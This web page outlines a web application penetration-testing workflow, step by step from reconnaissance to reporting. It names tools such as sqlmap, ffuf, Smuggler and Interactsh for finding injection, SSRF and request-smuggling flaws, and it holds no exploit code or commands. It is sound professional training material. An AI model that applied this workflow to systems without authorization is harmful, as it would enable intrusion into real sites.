Web Application Penetration Test
A systematic approach to testing web applications for security vulnerabilities. Covers reconnaissance, mapping, vulnerability discovery, exploitation, and reporting.
Scope and Reconnaissance
Understand what you're testing. Get the target URLs, any credentials provided, and the rules of engagement. Then start passive recon - discover subdomains, identify the technology stack, find JavaScript files and API endpoints, and check for any publicly exposed sensitive files.
Subfinder
WhatWeb
waybackurls
gauTip: httpx quickly probes discovered subdomains to find live web servers. Katana crawls the application to map all endpoints. waybackurls and gau find historical URLs that may still be accessible. WhatWeb fingerprints the technology stack.
Mapping and Discovery
Map the application's attack surface. Brute-force directories and files, identify all input points (forms, URL parameters, headers, cookies), find API endpoints, and understand the authentication mechanism. The goal is to have a complete picture of every way you can interact with the application.
Tools for this step
Feroxbuster
ffuf
Gobuster
Arjun
ParamSpider
LinkFinderTip: Feroxbuster and ffuf are the fastest directory bruters. Arjun discovers hidden HTTP parameters. ParamSpider mines archived URLs for parameters. LinkFinder extracts endpoints from JavaScript files - this often reveals API routes the UI doesn't expose.
Automated Vulnerability Scanning
Run automated scanners to catch the low-hanging fruit. Template-based scanners like Nuclei check for thousands of known vulnerabilities, misconfigurations, and exposed sensitive files. Combine this with specialized scanners for specific vulnerability classes.
Tools for this step
Nikto
WPScan
sqlmapTip: Nuclei with the default template library catches an enormous amount. Run it first. Use Interactsh alongside Nuclei to detect blind/out-of-band vulnerabilities like SSRF and log4shell. WPScan if it's WordPress. Nikto for general web server checks.
Manual Testing
This is where the real work happens. Use a web proxy to intercept and modify requests. Test every input point for injection vulnerabilities (SQL, XSS, command injection, SSTI). Check authentication and session management. Look for access control flaws - can you access other users' data? Can you escalate privileges? Test file upload functionality, API authorization, and business logic.
Tools for this step
Burp Suite Community
DalFox
CommixTip: Burp Suite is the backbone of manual web testing - learn it well. sqlmap automates SQL injection detection and exploitation. XSStrike and DalFox find reflected and DOM XSS. Commix handles OS command injection. Always test manually too - automated tools miss logic flaws.
Testing for Advanced Vulnerabilities
Go beyond the OWASP Top 10. Test for HTTP request smuggling, CRLF injection, CORS misconfiguration, server-side request forgery (SSRF), and web cache poisoning. These are often missed by automated scanners but can be critical.
Tools for this step
Smuggler
CRLFuzzTip: Smuggler tests for CL.TE and TE.CL desync vulnerabilities. CRLFuzz scans for response splitting. Use Interactsh callback URLs when testing for blind SSRF - if the server makes an outbound request to your URL, you've found it.
Screenshot and Evidence Collection
As you find vulnerabilities, document everything. Take screenshots, save request/response pairs, and record the exact steps to reproduce each finding. For large target surfaces, use automated screenshot tools to capture the state of every endpoint.
Tools for this step
Aquatone
EyeWitnessTip: Aquatone and EyeWitness generate browsable HTML reports from URL lists. Run these early for visual recon and again at the end to document your findings. Save Burp project files as evidence.
Other Workflows
OSINT Investigation Workflow
A structured approach to open-source intelligence gathering, from target identification through to reporting. Covers passive reconnaissance, social media analysis, email and phone lookups, and data correlation.
Active Directory Attack Path
From initial foothold to domain admin. A step-by-step approach to enumerating and attacking Active Directory environments during authorized penetration tests.
Cryptocurrency Tracing Workflow
Tracing cryptocurrency transactions from a known address through the blockchain. Covers wallet identification, transaction graph analysis, exchange detection, and entity attribution.